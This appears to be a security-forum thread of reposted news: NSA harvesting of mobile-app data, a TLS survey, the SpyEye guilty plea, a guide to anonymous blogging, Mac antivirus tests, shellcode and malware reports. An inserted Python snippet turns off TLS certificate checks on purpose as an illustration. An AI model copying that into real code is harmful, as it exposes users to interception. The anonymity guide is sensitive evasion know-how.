Given how popular Angry Birds is, and given that the secret documents use it as a case study, some articles have hung Angry Birds in their headlinery - that's like finery, but with headlines instead of undies. But Angry Birds shouldn't be singled out as being in any way subverted or corrupted by the NSA or GCHQ. Angry Birds is, after all, just one of thousands of mobile apps, none of which has been indicted as complicit with, or data-raked by, the NSA or GCHQ - rather, the spying agencies are, as news reports say, simply tapping data as it flies across the network. Rovio, the maker of Angry Birds, told the Guardian that it wasn't aware of any NSA or GCHQ programs looking to extract data from its apps users. The newspaper quotes Saara Bergström, Rovio's VP of marketing and communications: Rovio doesn't have any previous knowledge of this matter, and have not been aware of such activity in third-party advertising networks. Nor do we have any involvement with the organisations you mentioned [NSA and GCHQ]. The NSA's data sniffing is far from news, of course - the names PRISM and XKeyscore should ring some bells in that department. Much of the profile data in question isn't being nefariously pickpocketed from app users, at any rate. As Naked Security pointed out on Monday in honor of Data Privacy Day, many of us are willingly giving our personal data away. It's easy to see why: it's a heck of a lot more fun to have apps spill your beans, since in exchange we get linked to communities or get shiny doo-dads. All we have to do is fill out profiles with stuff they actually don't, really, need - birthdates, marital status, etc. We can take back a big chunk of our privacy simply by refusing to hand over data, whether it's given in a profile or beamed out when we have WiFi and/or geolocation turned on. Cinching our data waistbands can be done with three simple steps, outlined by Naked Security in the Privacy Plan Diet. 
If you can live without "Find My iPad" or other such geolocation-dependent goodies, you can keep a lot of your data out of the hands of spies, marketers or other data busybodies. But beyond information knowingly handed over in profiles, phone apps have a nasty habit of sharing more data than users may realize. Sometimes the holes come from software bugs, but then again, sometimes data leakage is an unintended consequence of users' own, deliberate actions, such as:

- Twitter users having geolocation turned on, using the word "home" in their tweets and, Presto! thereby potentially handing a nosy little application their home address.
- Soldiers snapping photos that smartphones then automatically geotag, giving the enemy their coordinates.
- Fugitives' locations - John McAfee comes to mind - babbled by a photo's location metadata, precise latitude, longitude, time and all.

Beyond bugs and deliberate leakage from probably-inattentive users is yet another category: apps that silently gulp data in the background while they're doing innocent-seeming things in the foreground, such as being a flashlight or a mobile app for kids. There are issues with mobile privacy, and then too there's security. Specifically, phones have lagged behind websites in their use of encryption, such as, for example, the notable lack of security in banking apps. Why cast a hairy eyeball at privacy as it plays out in Angry Birds profile data when you've got iOS banking apps to worry about? Given recent research from Ariel Sanchez, a researcher at security assessment company IOActive, there's very little security indeed to be had there.
Sanchez found that out of 40 iOS banking apps used by 60 banks in about 20 countries, 70% of the apps offered no support at all for two-factor authentication (2FA), and 40% of the apps weren't validating SSL certificates - in other words, they weren't able to notice bogus SSL certificates when accessing supposedly secure HTTPS traffic and couldn't, therefore, stop a theoretical man-in-the-middle attack. What does this have to do with Angry Birds et al.? If the connection between the phones and the servers such apps were talking to had been well-encrypted, then it's likely that the data they exchanged would have been unintelligible to anyone trying to read it on-the-wire. Should Angry Birds, or ads on Angry Birds, or the other apps in question, or the ads on those apps, have been using HTTPS or some form of encryption? Yes. But the lack of such security measures isn't, unfortunately, remarkable, as research including Sanchez's work on iOS banking apps makes clear. Sursa: Spy agencies are slurping personal data from leaky mobile apps | Naked Security
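The certificate-validation failure Sanchez describes is easy to see in code. Here is a minimal sketch using Python's standard ssl module, contrasting a validating client context with the "accept anything" behavior of the broken apps (an illustration only, not code from the study):

```python
import ssl

def strict_context() -> ssl.SSLContext:
    """What the apps should use: verifies the certificate chain AND the hostname."""
    return ssl.create_default_context()

def broken_context() -> ssl.SSLContext:
    """Roughly what 'not validating SSL certificates' amounts to: any cert,
    including a man-in-the-middle's forgery, is silently accepted."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # must be disabled before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx
```

A client built on the second context cannot distinguish its real server from an attacker terminating the TLS connection, which is exactly the theoretical man-in-the-middle attack described above.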
  17. SSL/TLS analysis of the Internet's top 1,000,000 websites
By Julien Vehent, Saturday, January 11, 2014, 00:32

It seems that evaluating different SSL/TLS configurations has become a hobby of mine. After publishing Server Side TLS back in October, my participation in discussions around cipher preferences, key sizes, elliptic curve security, etc. has significantly increased (ironically so, since the initial, naive goal of "Server Side TLS" was to reduce the amount of discussion on this very topic). More guides are being written on configuring SSL/TLS server side. One that is quickly gaining traction is Better Crypto, which we discussed quite a bit on the dev-tech-crypto mailing list. People are often passionate about these discussions (and I am no exception). But one item that keeps coming back is the will to kill deprecated ciphers as fast as possible, even if that means breaking connectivity for some users. I am absolutely against that, and still believe that it is best to keep backward compatibility for all users, even at the cost of maintaining RC4 or 3DES or 1024-bit DHE keys in our TLS servers. One question that came up recently on dev-tech-crypto is "can we remove RC4 from Firefox entirely?". One would think that, since Firefox supports all of these other ciphers (AES, AES-GCM, 3DES, Camellia, ...), surely we can remove RC4 without impacting users. But without numbers, it is not an easy decision to make. Challenge accepted: I took my cipherscan arsenal for a spin and decided to scan the Internet. Article: https://jve.linuxwall.info/blog/index.php?post/TLS_Survey
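cipherscan probes servers; you can ask the complementary question of a client-side TLS stack. A small sketch (not cipherscan itself) that lists the cipher suites Python's default context would offer and flags the deprecated families debated above:

```python
import ssl

# Enumerate the cipher suites the default client-side context offers,
# then pick out the legacy families (RC4, 3DES) discussed in the survey.
ctx = ssl.create_default_context()
offered = [c["name"] for c in ctx.get_ciphers()]

legacy = [n for n in offered if "RC4" in n or "3DES" in n or "DES-CBC3" in n]
print(f"{len(offered)} suites offered; legacy suites: {legacy or 'none'}")
```

On a modern OpenSSL build the legacy list is typically empty, which is precisely why the survey had to measure servers rather than assume clients still needed RC4.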
  18. SpyEye malware creator Aleksandr Panin pleads guilty
Graham Cluley | January 29, 2014 9:29 am

The primary developer of the notorious SpyEye banking malware has pleaded guilty to conspiracy to commit wire and bank fraud, in relation to his role in a cybercriminal campaign that has infected over 1.4 million computers worldwide. SpyEye, a variant of the Zeus banking Trojan, is used by criminal gangs to help them break into victims' online bank accounts and steal personally identifiable information. Sold on the criminal underground as a kit for between $1,000 and $8,500, hackers could take SpyEye and customise it for their own malicious purposes. Once computers have become infected by SpyEye, online criminals are able to remotely control them, logging keystrokes and stealing personal and financial data that is silently transmitted to servers under the hackers' control.

According to a Department of Justice press release, Russian national Aleksandr Andreevich Panin (who used the online handles "Gribodemon" and "Harderman") has now admitted his involvement. "The apprehension of Mr. Panin means that one of the world's top developers of malicious software is no longer in a position to create computer programs that can victimize people around the world. Botnets such as SpyEye represent one of the most dangerous types of malicious software on the Internet today, which can steal people's identities and money from their bank accounts without their knowledge. The FBI will continue working with partners domestically and internationally to combat cyber-crime."

Between 2009 and 2011, Panin operated from his Russian base, conspiring with others to develop, market and sell versions of SpyEye to other online criminals. In all, Panin is thought to have sold the SpyEye malware kit to over 150 criminals. One of them, using the name "Soldier", is reported to have used SpyEye to earn more than $3.2 million in just six months.
Panin's cybercrime career came unstuck, however, when he took a holiday in the Dominican Republic last summer. Without formally extraditing him, local police threw him onto a plane to the United States, where he was arrested by federal agents. The nature of Panin's arrest raised controversy in Russia, where the foreign affairs ministry warned citizens who believed they might have charges raised against them to avoid travelling overseas.

Arrests at airports appear to have become a theme in the apprehension of the key individuals involved in the SpyEye malware case. Amongst Panin's alleged conspirators was Hamza Bendelladj, aka "Bx1", who smiled broadly as he was paraded before the media after his arrest at Bangkok's Suvarnabhumi airport in January 2013, while in transit from Malaysia to Egypt. Bendelladj was subsequently extradited to the United States, where charges against him are currently pending. Sentencing for Panin is scheduled for April 29, 2014. Sursa: SpyEye malware creator Aleksandr Panin pleads guilty
  19. How to Start an Anonymous Blog
26 January 2014

Introduction

I believe that by following the steps I outlined in this post, no one will ever be able to reveal my identity. My domain may be seized and my blog may be closed, but I am confident that my identity will remain a mystery. I can say these things mainly because I believe in a very important tool called Tor. Developers and operators of Tor nodes work to ensure that anyone can be anonymous on the internet. Tor is a great pain to the NSA and any other organization or country that wants to spy on internet activity. The Tor network makes it very difficult to track down IP addresses, and domain registration is now available via Bitcoin, so I never needed to provide any personal information when setting up this blog.

Tools and Resources

- USB drive
- Tails OS
- Tor network
- LocalBitcoins (buy Bitcoins for cash)
- Free email accounts from outlook.com and anonymousspeech.com
- Domain name purchased from IT Itch
- Static site hosted on GitHub Pages

Tails / Tor

Tails is started from a USB disk, which also includes an encrypted partition. The encrypted partition holds a Bitcoin wallet, the blog's source code and a Keepass database. My passwords for third-party services are randomly generated and very strong. Tails makes it very hard to go wrong, because all network connections are forced through Tor. For example, to develop this blog locally, I must add some firewall rules to allow local connections on port 4000, download a different browser (Midori), and then tell it to skip using a proxy server. The firewall rules block all external requests in Midori, but I can access http://localhost:4000. So unless I do some nonsense like log in to StackOverflow using my real Google account and use the "untraceableblog" username, I believe it will be almost impossible to track me. I make a backup of the USB flash drive on my primary computer and save it to a TrueCrypt hidden volume. I like the idea of hidden volumes; I feel like a fucking spy.
The idea is that you can have a fake password that unlocks the fake encrypted folder, and a real password that unlocks the real encrypted folder, and there is absolutely no way to know which one you unlocked. In my fake encrypted folder, I keep my personal Keepass database, credit cards, and scans of my passport and driving license. So if someone forces me to enter my password to unlock my computer, and finds what looks like a TrueCrypt volume, there is no way of knowing whether I entered the real or the fake password. This feature offers at least a little protection against "wrench attacks": XKCD: wrench attacks

Most of the time I hide the stick in a secret location in the house. When I need to go somewhere and want to be able to update this blog, I back it up to the hidden volume and then securely erase the USB disk, so I can take it with me without fear. This is what I must do until Tails adds its own support for hidden volumes.

E-mail

I signed up for a free email account from Outlook.com, and used an anonymousspeech.com account for verification and backup. I tried Gmail first, but Google makes it very difficult to sign up for accounts when you use Tor, because they require phone verification. This is fair enough, because people like to create a huge number of fake Gmail accounts to send spam.

Blog

This blog is hosted for free on GitHub Pages. It uses Octopress to create a static site, and I installed the Page Turner theme. I push to GitHub with an SSH key, which is, of course, encrypted and stored on my USB stick. I can think of two vectors which could give away information about my identity:

Message timestamps

The Tails operating system has a good policy of forcing the system time to always be UTC. But if I wrote a series of blog posts over the coming years, you could maybe analyze the timestamps to determine my time zone. However, the compiled site shows only the date. Also, I travel a lot. (Or do I?)
Word and character frequency analysis

You may be able to find out my country of origin or identity from my words and phrases. You might even be able to find a match with other content that I posted online under my real identity. I counter this by running all my posts through Google Translate. I translate into another language, then back to English, and then correct the errors. It's great for mixing up my vocabulary, but I wish it didn't fuck up Markdown and HTML so much. Until this point, you might have assumed that English was my second language. But let me assure you, I will neither confirm nor deny it. One problem is that Google can see my original messages, and the NSA can probably see them too. If I wanted to avoid that, I could post some anonymous translation jobs and pay the translators via Bitcoin.

Analytics

See the email section for reasons why Google Analytics was unavailable. I signed up for StatCounter instead. But even if Google Analytics were available, I wouldn't use a tracking ID linked to my real identity. Many anonymous bloggers have been busted by Google's Reverse ID Lookup tool.

Buying Bitcoins with maximum anonymity

I bought the Bitcoins on LocalBitcoins, using an anonymous account that I set up over Tor. I found a seller who was willing to meet in person, and we agreed on a time and place. We met, I gave them money, and they released the Bitcoins from escrow using their phone.

Buying a domain name with Bitcoins

IT Itch is a domain registrar that accepts payments via BitPay. Their domains are quite expensive at $15 USD each, but worth it for completely anonymous registration. This was an easy process, but it took a long time for the domain to become active (over an hour). Once it had been activated, I configured the DNS records for GitHub Pages, and then my blog was live at Untraceable. One thing that IT Itch did terribly wrong was to e-mail me my password in plain text after I signed up. NO GOOD!
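The word-frequency fingerprinting worried about under "Word and character frequency analysis" above can be sketched as a toy comparison. Real stylometry is far more sophisticated; these helper names are made up for illustration:

```python
import re
from collections import Counter

def top_words(text: str, n: int = 5) -> list[str]:
    """The n most frequent words in a text, a crude writing 'fingerprint'."""
    words = re.findall(r"[a-z']+", text.lower())
    return [w for w, _ in Counter(words).most_common(n)]

def overlap(a: str, b: str, n: int = 5) -> float:
    """Fraction of top-n words two texts share; high overlap hints at one author."""
    return len(set(top_words(a, n)) & set(top_words(b, n))) / n
```

Round-tripping a post through a translator shuffles exactly the vocabulary this kind of comparison keys on, which is the point of the author's Google Translate trick.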
If someone got access to my Outlook email, they could have signed in and hijacked my domain. So I deleted the message and changed my password, and luckily they did not email me the new password.

How I could get busted, Part One: Tracing the Bitcoins

In theory, you could follow the trail of Bitcoin transactions and discover my identity. However, in this case, it is very unlikely that even the most sophisticated and well-funded organizations would be able to find me. See, I bought these Bitcoins using an anonymous account on localbitcoins.com (created using Tor). The seller and I agreed to meet in person, and I paid cash. To reveal my identity, you would need to break, or work for, every service that I used. Like this:

1) Get access to the ititch.com database, and find the BitPay transaction identifier for untraceableblog.com.
2) Get access to the BitPay database, and find the Bitcoin address that sent Bitcoins for this transaction.
3) Get access to the localbitcoins.com database. Find the Bitcoin address which sent the coins to BitPay, and trace the transactions back until you find a localbitcoins escrow address.
4) From the escrow address, you might be able to find the localbitcoins accounts, and then you can read the messages that we exchanged about meeting up.
5) You would need to visit this location, and hope that some surveillance cameras captured us on the day.
6) You'd finally need access to the security company that archives the camera footage, get a clear picture of my face, and somehow run a facial recognition scan to find my identity. Working for Facebook or the NSA may help if you get that far.

How I could get busted, Part Two

Everything is hacked. All of it. The Internet is a machine based on trust, and there are many ways that this trust can be broken.
Someone may be able to generate trusted SSL certificates for any domain, demand that ISPs route all traffic through them, or control a huge number of Tor nodes and perform traffic analysis attacks. I will not go into details, but if you're interested, you can read more about attacks on Tor: how the NSA attacks Tor/Firefox users with QUANTUM and FOXACID, and the articles about Tor attacks on the Tor blog.

Conclusion

This blog was just a fun exercise in anonymity, although I might use it to post some things in the future. I am just using the tools built by people much smarter than me, and I'm certainly not the first anonymous blogger, but I hope you learned something new. Of course, the rabbit hole can go much deeper than this. I could have hosted this blog on a VPS that I rented with Bitcoins, and set up the server as a Tor hidden service. The server's IP address would be fully protected, but then you could only have read the blog by connecting to the Tor network, and onion links just don't make it to the front page. I could have also done all my activities from a coffee shop, just in case Tor was compromised, but I couldn't be fucked. Finally, I could have chosen an ".se" domain if I was scared of U.S. government intervention. That's what The Pirate Bay is using now, and the Swedes are just letting them do their thing. Please feel free to send me some spare Satoshis if you enjoyed the post: 146g3vSB64KxxnjWbb2vnjeaom6WYevcQb. And if you can find me, I'll be very impressed. Sursa: Untraceable
  20. Mac anti-virus testing 2014 Posted on January 27th, 2014 at 8:49 AM EST Almost exactly one year ago, I completed a round of tests of 20 different anti-virus programs on the Mac. Because this is an area of software that is in almost constant flux, I felt it was important to repeat that test this year. I was very curious about whether these programs were still as effective (or ineffective) as they had been, and how well they detected new malware that had appeared since the last test was performed. After last year’s testing, I received a number of requests for tests of other apps. This year’s testing sees a change in some of the apps being tested. Four new apps were added, while two were removed from testing (one simply because it was redundant). The malware samples used also went through a change. Some samples were removed, in an attempt to remove any that might have been deemed questionable, while others were added. Multiple samples of each of nine new malicious programs, which did not exist at the time of last year’s testing, were included. Scope As with last year, it’s important to understand the scope of this testing. This test is a measure only of the detection of specific malware samples when performing a manual scan. It makes no attempt to quantify the performance or stability of the various anti-virus apps, or to compare feature sets, or to identify how well an anti-virus app would block an active infection attempt. In a way, this test is merely a probe to see what items are included in the database of signatures recognized by each anti-virus app. The success of an app in this testing should not be taken as endorsement of that app, and in fact, some apps that performed well appear to have anecdotal problems that frequently appear in online forums. It is also important to understand small variations in the numbers. Some of the software that was tested varied from each other, or from last year’s testing, by only a couple percentage points. 
It’s important to understand that such a variation is not significant. A 98% and a 97%, or a 60% and a 59%, should be considered identical, for all intents and purposes. Methods Testing methodology was mostly the same as last year. A group of 188 samples, from 39 different malware families, was used for testing. Any samples that were not already present in the VirusTotal database were uploaded to VirusTotal, so that the samples would be available to the anti-virus community. The SHA1 checksum of each sample is included in the data, to allow those with access to VirusTotal to download the samples used and replicate my tests. Where possible, the full, original malware was included in testing. In many cases, such a sample will be found within a .zip or .dmg archive on VirusTotal, but such samples were not included in that form. All items were removed from their archives, and the archives were discarded, in order to put all anti-virus engines on a level playing field. (Some will check inside such archives and some will not.) In a number of cases, I have not been able to obtain full copies of the malware, but included executable components and the like. Testing was done in virtual machines in Parallels Desktop 9.0.24172.951362. I started with a virtual machine (VM) that consisted of a clean Mac OS X 10.9.1 installation, with Chrome and Firefox also installed. A snapshot of this system was made, and then this VM was used as the basis for all testing. I installed each anti-virus app (engine) in that VM, saved a snapshot, reverted to the original base VM and repeated. Once installations were done, I ran each VM and updated the virus definitions in each anti-virus app (where possible), then saved another snapshot of this state and deleted the previous one. The end result was a series of VMs, each containing a fully up-to-date anti-virus app, frozen at some time on January 16. After that point, testing began. 
Testing took multiple days, but with the network connection cut off, the clock in the virtual system remained set to January 16, shortly after the anti-virus software was updated, and further background updates were not possible. Malware was copied onto the system inside an encrypted .zip file (to prevent accidental detection), which was then expanded into a folder full of samples. Each anti-virus app had any real-time or on-access scanning disabled, to prevent premature detection of malware. If an error was made, and malware was detected and quarantined in the process of expanding the archive, the VM was reset, settings in the anti-virus app were changed, and the process repeated. Once the malware was in place, scans commenced. Each app was used to scan that folder, or if custom scans were not allowed, a scan was done that would include the test user’s home folder, where the malware samples resided. Results were collected, in most cases in a very inconvenient manner. A few of the anti-virus apps allowed me to save or retrieve a log that contained information about what was detected, but most did not. In most cases, I was only able to capture the data by paging through a list of detected malware and taking a series of screenshots. Once collection of the data was done, a post-scan snapshot of the VM was saved, so that the results could be reviewed later as necessary. After the data was collected, the painstaking process of tabulating it began. Data was entered in a Numbers spreadsheet. A great deal of care was taken to ensure that no errors were made, but when tabulating data of this nature (trying to match up 64-digit hexadecimal numbers), it is entirely possible that transcription errors ended up in the data. Any errors brought to my attention will be immediately corrected. Data The complete data can be downloaded as either a Numbers spreadsheet or a PDF file. 
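Since the published data includes a SHA1 checksum for every sample, replicating the test starts by confirming you fetched the same files from VirusTotal. A minimal verification sketch (the path and digest in the usage comment are placeholders, not values from the study):

```python
import hashlib
from pathlib import Path

def sha1_of(path: Path) -> str:
    """Hex SHA1 digest of a file, read in chunks so large samples are fine."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

# Usage (hypothetical values):
# assert sha1_of(Path("sample.bin")) == "<digest from the spreadsheet>"
```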
(An Excel file was not provided because some of the formatting that made the data more readable did not make the conversion well.) Detection rates (defined as the percentage of samples that were detected) varied widely, from 99% down to 0%. Only 9 anti-virus engines tested performed at 91% or better, and around 2/3 of the engines got a "passing grade" (72% and up). Nine performed at 60% or lower. Five did so poorly - between 12% and no detections at all - that I would consider them to be scams.

Engine                                            Samples detected   Percentage detected
VirusBarrier 10.7.8 (772)                         187                99%
avast! Free Antivirus 8.0 (40005)                 184                98%
ESET Cybersecurity 5.0.115.0                      182                97%
Sophos Anti-Virus for Mac 9.0.6                   182                97%
Avira Mac Security 2.0.1.105                      181                96%
F-Secure Anti-virus for Mac 0.1.?                 181                96%
Dr. Web Light 6.0.6 (201207050)*                  179                95%
Kaspersky Security 14.0.1.46                      177                94%
Comodo Antivirus 1.1.214829.106*                  172                91%
WebRoot SecureAnywhere 8.0.5.82                   162                86%
Norton Anti-Virus 12.6 (26)                       158                84%
BitDefender 2.21 (2.21.4959)*                     143                76%
ClamXav 2.6.1 (304)                               136                72%
AVG AntiVirus 14.0 (4172)                         115                61%
Trend Micro Titanium 2.0.1279                     112                60%
ProtectMac 1.4                                    107                57%
McAfee Endpoint Protection for Mac 2.1.0 (1085)   99                 53%
FortiClient 5.0.7.135                             22                 12%
iAntivirus 1.1.4 (282)                            19                 10%
MacScan 2.9.4*                                    4                  2%
Magician Anti-Trojan 1.4.8                        1                  1%
MaxSecureAntivirus 1.0.1 (1.0.1)                  0                  0%

(* The version of anti-virus apps marked with an asterisk did not change since last year's testing, though of course this has no bearing on signature database updates.)

Last year, detections were broken down into active and inactive malware. I decided not to do that this year, as in some cases the decision about whether to identify a particular piece of malware as active or inactive is difficult to make. Instead, I listed the year each malware family first appeared, and sorted the results by that year. In general, most malware that appeared in 2011 and earlier is inactive at this point, while a significant portion of malware newer than that is probably still active.

Exploit.OSX.Safari

Detection rates of each sample varied widely, with an average of 14 engines detecting each sample.
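As a sanity check, every "percentage detected" figure in the table is just the engine's sample count divided by the 188-sample corpus from the Methods section, rounded to a whole percent. A quick illustrative helper (not the author's code):

```python
# Detection percentages as used in the table: detections over the
# 188-sample corpus, rounded to the nearest whole percent.
TOTAL_SAMPLES = 188

def pct(detected: int, total: int = TOTAL_SAMPLES) -> int:
    return round(100 * detected / total)

print(pct(187), pct(162), pct(22))  # 99 86 12, matching the table rows
```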
One sample was detected by only 6 anti-virus engines, and three samples (all copies of Exploit.OSX.Safari) were detected by only one engine. These were included nonetheless because I know that they are malware. Strangely, in the case of the three Exploit.OSX.Safari samples, the malware is detected at a much greater rate when a .zip file containing the sample is scanned! The rate drops off to almost zero when the actual malicious file itself – a shell script disguised as a QuickTime movie – is scanned, both in my own testing and on VirusTotal.

Conclusions

Although it is important to keep in mind that this is only one measure of the quality of each of the tested anti-virus engines, it is not an unimportant one. Obviously it is not feasible for any anti-virus software to detect 100% of all malware, but a good engine should come as close to that number as possible. This is especially true in the Mac world, where the limited number of malware families means that detection rates very close to 100% should be possible. As expected, some engines did indeed perform to that standard. Other engines did not fare so well.

However, it is important to keep in mind that Mac OS X already does an admirable job of protecting against malware. At this time, there is no known malware capable of infecting a Mac running a properly-updated version of Mac OS X 10.6 or later, with all security settings left at the default (at a minimum). The intended role of the anti-virus software must also be taken into consideration, and some compromises in detection rate may be acceptable in exchange for desired behavior (or to avoid bad behavior). Someone who wants a low-impact engine for scanning e-mail messages for Windows viruses will have very different needs than someone who needs to protect a computer from an irresponsible teenager who will download and install anything that catches his/her attention. 
It should also be noted that this test says nothing whatsoever about detection rates of Windows or Android malware. An engine that performs well against Mac malware may do quite poorly on malware for other systems, and likewise, one that does poorly with Mac malware may be very good with other malware. If your primary goal is to use anti-virus software to catch malware for other systems, so as to avoid passing it on, then this testing is not particularly relevant.

When choosing anti-virus software, always take the full set of features into account, as well as seeking out community feedback regarding stability and performance. Be sure that you know how to uninstall the software before installing it, in case it causes problems and needs to be removed. If you should need to remove anti-virus software, always use the uninstaller provided with the software. Do not use generalized uninstall apps that claim to be able to find and remove all components of any application; such apps are unreliable. For more on the topic of protecting your Mac against malware, see my Mac Malware Guide.

Objections

There are a few objections that some may have to this test, so allow me to address them in advance.

First, some will object that this is a rather artificial test, and not a real-world one. Although it would obviously be better to test by trying to infect a system with a variety of malware and determining whether each anti-virus software would block the infection, this is impractical. Not only would it be exceedingly time-consuming even with only a few samples, but it would be fairly meaningless as well, since Mac OS X is currently able to block all known malware through a variety of methods. Testing with static samples may be less informative, but it does give valuable information about the completeness of each engine’s virus definitions database. The sample size has improved significantly since earlier testing, consisting of 188 samples. 
Of course, this is still a very small sample size compared to Windows anti-virus testing, in which many hundreds or thousands of samples would be used. On the other hand, considering that there are millions of malware samples to be had in the Windows world, and very few in the Mac world, 188 samples is probably a more statistically significant number than what is used for most Windows-based tests. My opinion is that the samples used are a pretty good selection of Mac malware.

A few of the engines tested appear to be enterprise-oriented programs. (In other words, they are aimed at being installed on large numbers of computers by large companies.) I chose to include these anyway, even though some people object to comparison of enterprise- and consumer-level anti-virus products. There are a number of end users who may be using one of these enterprise products on a company machine, and who are curious how well it detects Mac malware. It is also important to keep in mind that these tests do not represent a direct comparison between the engines being tested, but rather are a test against a particular standard: which samples are and are not detected.

Finally, some may object to the fact that more than half of the samples are what would be considered “extinct” malware, since such samples are no longer a real threat to anyone. However, information about what malware has been detected historically by an anti-virus engine is important for predicting future accuracy; in fact, looking at the data, there is no apparent increase in detection rate with newer malware. There’s also the fact that some people may be looking for anti-virus software for old, legacy systems that may still have malware infections from years past in place. After all, Intego recently revealed that there are still at least 22,000 Macs infected with the extinct Flashback malware. 
Anti-virus Engine Notes

There were a number of important or interesting points to make about specific anti-virus engines.

AVG provided no way that I could find to manually update its malware signatures. I simply allowed the VM containing AVG to run unattended for a while on January 16th, in an attempt to ensure the signatures were up-to-date. However, since there is also no apparent way to get information about the version of the signature database, I’m uncertain as to whether this strategy was successful.

The author of ClamXav is temporarily unable to add malware signatures to the official ClamAV signature database, but is working on a version of ClamXav that can download Mac-specific signatures separately. Once this is done, ClamXav detections should be able to get back on track.

Comodo’s installer was identified as being from an unidentified developer, due to not being code signed with a valid Apple Developer ID, and thus was blocked by Gatekeeper. This is a very serious failing on the part of a security app, in my opinion. I was forced to bypass Gatekeeper in order to install the program.

iAntivirus apparently does not feature any kind of mechanism for updating its definitions. (This is confirmed by a Symantec employee in the Norton forums.) I am unsure of the exact age of the current version of iAntivirus (version 1.1.4), but the comments people have made about this version in the Mac App Store date back to April 15, 2013, meaning that the malware signatures are at a minimum nine months old!

MacKeeper was removed from testing. It is an app that I actively recommend against using, but its anti-virus “back end” is an engine that performs well in my testing. I did not want to seem to give legitimacy to the program when I am strongly opposed to its use.

Magician is an app very similar to MacKeeper, and appears to be of similar quality, since it detected only a single sample. I strongly advise against its use in any capacity. 
MaxSecureAntivirus detected absolutely none of the samples. It was the only app I was forced to purchase (for $10) in order to test. Apple has given me a refund, and is reviewing the app at this time. It is my hope that it is removed from the App Store, as it is a complete and utter scam, in my opinion.

Norton’s performance was absolutely abysmal, even considering the limited performance of the VM it was running in. Nearly every action, including mounting a USB flash drive containing the malware in the Finder, took far longer than it did with any of the other VMs used in testing.

VirusBarrier Express was removed from testing due to redundancy. It should have the same detections as VirusBarrier, so I chose not to test it.

Updates

January 28, 2014: 5 samples were inadvertently included as .jar archive files. These files were decompressed and re-scanned with all engines that missed them the first time around. There were very few changes; only the VirusBarrier, AVG and iAntivirus results changed. Revision 2 of the data files is now available at the original links given in the Data section.

Sursa: The Safe Mac
  21. Shellcodecs is a collection of shellcode, loaders, sources, and generators, provided with documentation, designed to ease the exploitation and shellcode programming process.

Contents

1 Dependencies
2 Contents
3 Download shellcodecs
4 Building the code
5 Using the tools
  5.1 Generators
    5.1.1 Standard shellcode generator
    5.1.2 Socket re-use shellcode generator
  5.2 Loaders
6 Getting help
7 Credits

Dependencies

In order to run these shellcodes, the following dependencies are required:

Linux
GCC
Python 2.7 (required by the generators)
Automake

Unless otherwise noted, code is amd64; there are various 32-bit examples as well. If you think you may have an out-of-date version, or that the official version is out of sync with the site, the latest sources will be available 100% of the time in the shellcode appendix.

Link: Shellcodecs - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
  22. AddressSanitizer

AddressSanitizer: a fast memory error detector
Updated Oct 16, 2013 by samso...@google.com

Contents

Introduction
Getting AddressSanitizer
Using AddressSanitizer
Interaction with other tools
  gdb
  ulimit -v
Flags
Call stack
Incompatibility
Turning off instrumentation
FAQ
Comments?

New: AddressSanitizer is released as part of LLVM 3.1.
New: Watch the presentation from the LLVM Developer's meeting (Nov 18, 2011) and the slides.
New: Read the USENIX ATC '2012 paper.

Introduction

AddressSanitizer (aka ASan) is a memory error detector for C/C++. It finds:

Use after free (dangling pointer dereference)
Heap buffer overflow
Stack buffer overflow
Global buffer overflow
Use after return
Initialization order bugs

This tool is very fast. The average slowdown of the instrumented program is ~2x (see PerformanceNumbers). The tool consists of a compiler instrumentation module (currently, an LLVM pass) and a run-time library which replaces the malloc function. The tool works on x86 Linux and Mac.

See also:
AddressSanitizerAlgorithm -- if you are curious how it works.
ComparisonOfMemoryTools

Sursa: https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer
  23. Android bootkit malware infects more than 350,000 Android devices

Graham Cluley | January 29, 2014 8:46 am

Experts at Russian security firm Dr Web have issued a warning about a dangerous Trojan horse affecting more than 350,000 Android users. What makes this malware attack unusual is that it is designed to reinstall itself after you reboot your Android device, reinfecting the system even if you have deleted all of its working components.

Dr Web has dubbed the malware Android.Oldboot, and reports that it can download, install and remove applications on infected Android devices, opening opportunities for hackers to gain control of, and make money from, the hundreds of thousands of Android devices already infected.

And, according to the researchers, the devices most at risk appear to be those which have been reflashed with modified firmware (it’s not unusual for Android owners to root their devices and install customised versions of the operating system onto their smartphones). Reflashing a device with modified firmware that contains the routines required for the Trojan’s operation is the most likely way this threat is introduced.

Over 90% of the infected devices identified by the Dr Web researchers are based in China (the malware’s apparent target), but there are also reports of infections amongst Android users in Spain, Italy, Germany, Russia, Brazil, the United States and some South East Asian countries.

Android malware is a growing problem, and as more criminals try to earn money by exploiting Android devices we can expect to see more and more sophisticated attacks. Clearly it’s important for those Android users who are reflashing and rooting their devices to exercise caution over where they download the homebrewed alternative versions of the operating system, as it’s possible they could be harbouring malware.

And, realise this: if you’re not yet running anti-virus software on your Android device, you are playing an increasingly dangerous game. 
Sursa: Android bootkit malware infects more than 350,000 Android devices
  24. Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices

Multi-platform threat exploits old Java flaw, gains persistence.
by Dan Goodin - Jan 28 2014, 6:00pm EST

Researchers have uncovered a piece of botnet malware that is capable of infecting computers running Windows, Mac OS X, and Linux that have Oracle's Java software framework installed.

The cross-platform HEUR:Backdoor.Java.Agent.a, as reported in a blog post published Tuesday by Kaspersky Lab, takes hold of computers by exploiting CVE-2013-2465, a critical Java vulnerability that Oracle patched in June. The security bug is present in Java 7 u21 and earlier. Once the bot has infected a computer, it copies itself to the autostart directory of its respective platform to ensure it runs whenever the machine is turned on. Compromised computers then report to an Internet relay chat channel that acts as a command and control server.

The botnet is designed to conduct distributed denial-of-service attacks on targets of the attackers' choice. Commands issued in the IRC channel allow the attackers to specify the IP address, port number, intensity, and duration of attacks.

The malware is written entirely in Java, allowing it to run on Windows, OS X, and Linux machines. For added flexibility, the bot incorporates PircBot, an IRC programming interface based on Java. The malware also uses the Zelix KlassMaster obfuscator to prevent it from being reverse engineered by whitehat and competing blackhat hackers. Besides obfuscating bytecode, Zelix encrypts some of the inner workings of the malware.

Sursa: Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices | Ars Technica
  25. Automated exploit for CVE-2012-3152 / CVE-2012-3153 by Mekanismen

